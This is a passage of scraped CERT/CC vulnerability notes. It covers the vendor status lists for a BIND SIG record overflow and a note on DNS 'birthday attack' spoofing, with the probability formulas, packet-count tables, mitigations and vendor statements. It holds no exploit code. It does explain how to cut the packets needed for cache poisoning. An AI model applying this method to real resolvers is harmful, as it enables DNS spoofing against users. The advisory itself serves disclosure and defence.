time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### 
Open Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### OpenBSD Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Oracle Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### PSPL Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this 
time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Process Software Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Putty Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RADIUSClient Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor 
Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### RSA Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Riverstone Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SGI Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### SSH 
Communications Security Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sendmail Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sequent Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### ShadowSupport Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments 
at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sony Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sophos Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Sun Microsystems Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Symantec Corporation Unknown\n\nNotified: November 12, 2002 Updated: April 01, 2003 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### The SCO Group (SCO Linux) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### The SCO Group (SCO UnixWare) Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no 
additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Threshold Networks Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Trend Micro Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### WU-FTPD Development Group Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Wind River Systems Inc. 
Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Wirex Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### XTRADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Xerox Corporation Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you 
have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### Xi Graphics Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### YARD RADIUS Unknown\n\nNotified: November 12, 2002 Updated: November 12, 2002 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23852283 Feedback>).\n\n### References \n\n<http://www.secunia.com/advisories/9856/>\n\n### Acknowledgements\n\nThanks to ISS for reporting this vulnerability.\n\nThis document was written by Jason A Rafail.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2002-1219](<http://web.nvd.nist.gov/vuln/detail/CVE-2002-1219>) \n---|--- \n**CERT Advisory:** | [CA-2002-31](<http://www.cert.org/advisories/CA-2002-31.html>) \n**Severity Metric:** | 30.38 \n**Date Public:** | 2002-11-11 \n**Date First Published:** | 2002-11-13 \n**Date Last Updated:** | 2004-10-18 14:58 UTC \n**Document Revision:** | 18 \n", 
"modified": "2004-10-18T14:58:00", "published": "2002-11-13T00:00:00", "id": "VU:852283", "href": "https://www.kb.cert.org/vuls/id/852283", "type": "cert", "title": "Cached malformed SIG record buffer overflow", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-18T20:44:29", "bulletinFamily": "info", "cvelist": ["CVE-2002-0029", "CVE-2002-1219", "CVE-2002-1220", "CVE-2002-1221"], "description": "### Overview \n\nVarious implementations of DNS services may allow multiple simultaneous queries for the same resource record, allowing an attacker to apply probabilistic techniques to improve their odds of successful DNS spoofing.\n\n### Description \n\nSome implementations of DNS services contain a vulnerability whereby multiple requests for the same resource record (RR) will generate multiple outstanding queries for that RR. As a result, it is possible for an attacker to apply a '[birthday attack](<http://mathworld.wolfram.com/BirthdayAttack.html>)' technique to dramatically improve the probability of a successful DNS spoofing attack. When performed against a caching nameserver, this can result in cache poisoning; however, similar techniques could be applied to some stub resolvers as well.\n\nThe only distinction between this attack and the traditional brute-force approach (1 query with multiple spoofed replies) is the generation of multiple simultaneous queries. The attacker need not sniff any packets between the victim resolver and the legitimate nameservers for the RR being spoofed. An attacker's success against any particular resolver instance will be probabilistic in nature, with a persistent attacker always being able to achieve a reasonable probability of success given enough attempts. \n \nBy rapidly generating multiple queries for an RR to a vulnerable resolver, the attacker can induce a condition whereby the vulnerable resolver has multiple open queries for that RR. 
The attacker then sends a number of spoofed responses to the vulnerable resolver. Given the right combination of open queries and spoofed responses, the attacker can achieve a high probability of success with far fewer packets (by several orders of magnitude) than the traditional brute-force approach would require. \n \nThis attack is quite effective against caching nameservers that provide recursive services. Recent research by Gummadi, Saroiu, and Gribble [GUMMADI] indicates that a large proportion of nameservers are configured to provide recursive services to the Internet at large, thereby laying them open to this kind of attack. \n \nThe specific number of packets required to exploit any particular DNS resolver varies by implementation, but the following table lists a few of the more common scenarios found in a number of implementations. \n \n**If the attacker has to guess...** | **...and is limited to the following number of open requests...** | **...it will take the following number of packets to achieve a 50% success rate (includes both requests and responses)** \n---|---|--- \nTID only (16 bits) | 1 | 32.7 k ($2^{15}$) \nTID only (16 bits) | 4 | 10.4 k \nTID only (16 bits) | 200 | 427 \nTID only (16 bits) | unlimited | 426 \nTID and port (32 bits) | 1 | 2.1 billion ($2^{31}$) \nTID and port (32 bits) | 4 | 683 million \nTID and port (32 bits) | 200 | 15 million \nTID and port (32 bits) | unlimited | 109 k \n \n_Table 1: Number of packets required to reach 50% success probability for various numbers of open queries_ \n \nAs expected, the traditional brute-force case where the attacker tries to guess the transaction ID or TID/port pair based on a single open request requires the attacker to search half the search space (15 or 31 bits, respectively) to achieve a 50% probability of success. However, when the attacker is able to induce the resolver into generating multiple simultaneous requests, the total number of packets required falls off rapidly. 
\n \nThere are, of course, more effective methods to achieve DNS spoofing in certain cases, including sniffing query packets directly or the predictable transaction ID issues discussed in [CA-1997-22](<http://www.cert.org/advisories/CA-1997-22.html>) \"BIND - the Berkeley Internet Name Daemon\". Additionally, Michal Zalewski's paper \"Strange Attractors and TCP/IP Sequence Number Analysis\" [ZALEWSKI] describes a method for analyzing the predictability of transaction IDs which we believe could be extended to analyze Transaction ID / UDP port pairs as well. Zalewski's paper was also discussed in [CA-2001-09](<http://www.cert.org/advisories/CA-2001-09.html>) \"Statistical Weaknesses in TCP/IP Initial Sequence Numbers\". \n \nThe 'birthday attack' method described here appears to be reasonably well known in the DNS developer community, but we have been unable to find significant public discussion of it and are thus documenting it here. \n \n**Further discussion of the probability calculations** \n \nAssume that the transaction IDs generated by the vulnerable resolver are unpredictable by the attacker (if they're not, then the attack is far simpler than what we describe here; see [CA-1997-22](<http://www.cert.org/advisories/CA-1997-22.html>) for more). The attacker does not know what the transaction IDs are, but can control how many transaction IDs the vulnerable resolver has open for a particular query at a given time by generating a series of otherwise legitimate queries. (The total number of transaction IDs open on the vulnerable resolver does not factor into this -- only the transaction IDs resulting from the attacker's queries count.) \n \nLet \n \n$m$ = the number of possible transaction ID / UDP port combinations \n \n$q$ = the number of open queries initiated by the attacker \n \n$r$ = the number of bogus replies generated by the attacker \n \nNote that if the UDP ports are predictable, $m = 2^{16}$. If they are not predictable, $m = 2^{32}$. 
Of course, if both the transaction IDs and UDP ports are predictable, $m$ approaches $1$. \n \nThe goal for the attacker, therefore, is to find the smallest possible sum $q + r$ with a maximum probability of success. \n \nThe first bogus reply sent by the attacker will have a probability of success given by \n \n$P_1 = q / m$ \n \nThe attacker does not need to care whether any particular reply was successful or not. The only thing the attacker has to keep track of is what IDs have been sent in the bogus replies so there will not be any duplicates. Thus, since the attacker knows what the ID was in the first reply and doesn't want to repeat IDs, he only has a pool of $m - 1$ IDs to pick from on the second reply. Therefore, the second reply has a probability of success of \n \n$P_2 = q / (m - 1)$ \n \nLikewise, for each successive iteration, the number of possible IDs the attacker will pick from shrinks by 1. In the generic case, \n \n$P_n = q / (m - (n - 1))$ \n \nEach $P_n$ represents the probability of success in the $n$th iteration, independently of all previous iterations. We can therefore represent the probability of a miss in the $n$th iteration as $Q_n$ where \n \n$Q_n = 1 - P_n = 1 - q / (m - (n - 1))$ \n \nThe cumulative probability of having missed in all iterations up to and including the $n$th iteration is \n \n$CumulativeMiss_n = Q_1 Q_2 ... Q_n$ \n \nand therefore the cumulative probability of at least one success with $r$ bogus replies is \n \n$CumulativeHit_r = 1 - CumulativeMiss_r$ \n \nThus we can calculate the probability of compromise given $q$ queries and $r$ replies. We do this by iteratively fixing $q$ and incrementing $r$ until we reach the desired $P_r$. To find the optimal combination of $q$ and $r$, we repeat the process for a number of values of $q$. \"Optimal\" is defined as the minimum sum $q + r$. 
\n \nWhen one considers cases where $q > 1$, it quickly becomes evident that the attacker's advantage grows significantly with relatively small numbers of queries ($q << m$). For example, performing the calculations as described above for $m = 2^{16}$, the attacker's probability of success reaches the 50% mark with as few as $q + r$ ≈ 425 packets. \n \n**References:** \n \n[GUMMADI] Krishna P. Gummadi, Stefan Saroiu, and Steven D. Gribble, \"King: Estimating Latency between Arbitrary Internet End Hosts\", [http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf](<http://www.icir.org/vern/imw-2002/imw2002-papers/198.pdf>) \n \n[ZALEWSKI] Michal Zalewski, \"Strange Attractors and TCP/IP Sequence Number Analysis\", <http://razor.bindview.com/publish/papers/tcpseq.html>\n\n[advisory-CAIS-vagner.pdf](<https://kb.cert.org/static-bigvince-prod-kb-eb/vulcoord/files/457875_attach_advisory-CAIS-vagner.pdf> \"advisory-CAIS-vagner.pdf\") \n \n### Impact \n\nAn attacker could leverage this vulnerability to remotely spoof DNS responses, which may lead to DNS cache poisoning. \n \n--- \n \n### Solution \n\nApply a patch from your vendor. \n \n--- \n \nDisable recursion on any nameserver responding to DNS requests made by untrusted systems. As mentioned in [\"Securing an Internet Name Server\"](<http://www.cert.org/archive/pdf/dns.pdf>): \n \n`Disabling recursion puts your name servers into a passive mode, telling them never to send queries on behalf of other name servers or resolvers. A totally non-recursive name server is protected from cache poisoning, since it will only answer queries directed to it. It doesn't send queries, and hence doesn't cache any data. Disabling recursion can also prevent attackers from bouncing denial of services attacks off your name server by querying for external zones. ` \nNon-recursive nameservers should be much more resistant to exploitation of the server vulnerabilities listed above. 
\n \n--- \n \n### Vendor Information\n\n### Apple Computer Inc. __ Affected\n\nNotified: October 29, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nAffected Systems: Mac OS X and Mac OS X Server. \n\nThis is fixed in Security Update 2002-11-21.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\n`-----BEGIN PGP SIGNED MESSAGE----- \n` \n`Security Update 2002-11-21 is now available. It contains BIND version \n8.3.4 \nto address multiple potential vulnerabilities. \n` \n`CVE IDs: CAN-2002-1219, CAN-2002-1220, CAN-2002-1221, CAN-2002-0029 \n` \n`Description: Several of these vulnerabilities may allow remote \nattackers \nto execute arbitrary code with elevated privileges. The other \nvulnerabilities \ncould allow remote attackers to disrupt the normal operation of DNS \nname service \nrunning on servers. \n` \n`Further information is available at: \n``<http://www.cert.org/advisories/CA-2002-31.html>`` \n``<http://www.kb.cert.org/vuls/id/457875>`` \n` \n`Affected systems: Systems that have enabled BIND and are using \nBIND versions 8.1, 8.2 to 8.2.6, and 8.3.0 to 8.3.3. 
\n` \n`Mitigating Factors: BIND is not enabled by default on Mac OS X or Mac \nOS X Server \n` \n`System requirements: Mac OS X 10.2.2 \n` \n`If BIND is enabled on Mac OS X systems prior to 10.2.2, the \nrecommendation \nis to either upgrade to Mac OS X 10.2 Jaguar then apply this Security \nUpdate, \nor to update BIND to version 8.3.4 from the ISC site at: \n``<http://www.isc.org/products/BIND/bind8.html>`` \n` \n`Security Update 2002-11-21 may be obtained from: \n` \n` * Software Update pane in System Preferences (for 10.2.2 or later) \n` \n` * Apple's Software Downloads web site: \n``<http://www.info.apple.com/kbnum/n120169>`` \n` \n` To help verify the integrity of Security Update 2002-11-21 from the \nSoftware Downloads web site, the download file is titled: \nSecurityUpd2002-11-21.dmg \nIts SHA-1 digest is: 9137fc5c1b8922475939ec93ab638494ff6e69be \n` \n`Information will also be posted to the Apple Support website: \n``<http://docs.info.apple.com/article.html?artnum=61798>`` \n` \n`This message is signed with Apple's Product Security PGP key, and \ndetails are available at: \n``<http://www.apple.com/support/security/security_pgp.html>`` \n` \n`-----BEGIN PGP SIGNATURE----- \nVersion: PGP 7.0.3 \n` \n`iQEVAwUBPd62ayFlYNdE6F9oAQH3DQf+PJNRB5NlLZim8i7hr0ef/obrjGrQ/PNL \nmpQ0bdgB7huFpUYw52YJcjIIFeI6XSgyP/QEEFfApy98y5CuEDXnC+raMniokD6D \nL4A25nhRByyxOC5lziKjQKLDWIEktQGXSHYr9cq7oIuo66gAxdQbZrT/brubu9sI \np/4g7sO1CuD5P/31RZUdHizG5lbN8dRGNgeh59FYQhpdYMbflrSolFL0FyxVc6aQ \nUwYbdnlt+wPiDqqWGL+YKv7GXV/XBk29mty6sLHqExx2bL8CH8ttUpZcFa8H+8VM \nyBXHJ0pnsCPrX+Q32o93ibm3HASXG+JcOrIC1kzvqlldSUvni1w6Kw== \n=/AHs \n-----END PGP SIGNATURE-----`\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Debian __ Affected\n\nNotified: October 29, 2002 Updated: July 24, 2003 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nDebian can't say anything about the 
vulnerability itself, except that since ISC refers to using tools from bind9, our bind8 packages are probably vulnerable.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Fujitsu __ Affected\n\nNotified: October 29, 2002 Updated: December 03, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nFujitsu's UXP/V o.s. is vulnerable. The relevant fix (PUF) will be announced at a later date.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### ISC __ Affected\n\nUpdated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe correct fix is \"deploy dnssec\".\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### InfoBlox __ Affected\n\nNotified: October 29, 2002 Updated: October 18, 2004 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Infoblox DNS One product is vulnerable when deployed in hostile territory with recursion enabled, for example, as a public Internet name server. 
See <http://www.infoblox.com/solutions/whitepapers_external.cfm> for details on how to configure the DNS One appliance to avoid this vulnerability.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### MetaSolv Software Inc. __ Affected\n\nNotified: October 29, 2002 Updated: November 18, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nMetaSolv Response REF:Vulnerability Note #457875 \n\n\nThe BIND code embedded in the DNS Server (Based on ISC BIND 8.2.3) on both MetaSolv Policy Services 4.1 and 4.2 (base) are open to Vulnerability Note #457875. This also applies to the BIND 8.2.6 Base in Policy services 4.2 Service Pack 1 efix 1. This issue is being tracked by MetaSolv under Case #28233. The customer base will be advised as to the potential vulnerability, and when ISC publishes sanctioned libraries these will be applied and published as an efix on Policy Services 4.2 Service Pack 1. MetaSolv Policy Services 5.0 is based on BIND 9.2.2 rc-1 and does not demonstrate the same predilection to the vulnerability as outlined in the note.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Microsoft Corporation __ Affected\n\nNotified: October 29, 2002 Updated: November 19, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nThe Microsoft DNS Server implementation closely follows the DNS standard. 
DNS is an insecure protocol and until such time as the protocol describes a method for securing queries, a determined attacker could poison the cache of a DNS Server. A number of precautions in the Microsoft DNS server make this style of attack more difficult, but not impossible. Microsoft is considering additional improvements to its DNS implementation in future versions of the Microsoft DNS server to reduce the effectiveness of attacks like this.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### NetBSD __ Affected\n\nNotified: October 29, 2002 Updated: November 21, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nNetBSD is shipped with ISC BIND nameserver (BIND8). See ISC's statement for more details.\n\n### Vendor Information \n\nThe vendor has not provided us with any further information regarding this vulnerability.\n\n### Addendum\n\nThe CERT/CC has no additional comments at this time.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23457875 Feedback>).\n\n### Openwall GNU/*/Linux __ Affected\n\nNotified: October 29, 2002 Updated: December 04, 2002 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nOne of the features added with BIND 4.9.x-OW patches has always been the addition of unpredictable query IDs, thus making BIND 4 with these patches applied more resistant against the described attacks. The randomization of source port numbers is, however, currently left up to the operating system kernel (and thus doesn't occur on most systems). Future versions of the patches might add this functionality. 
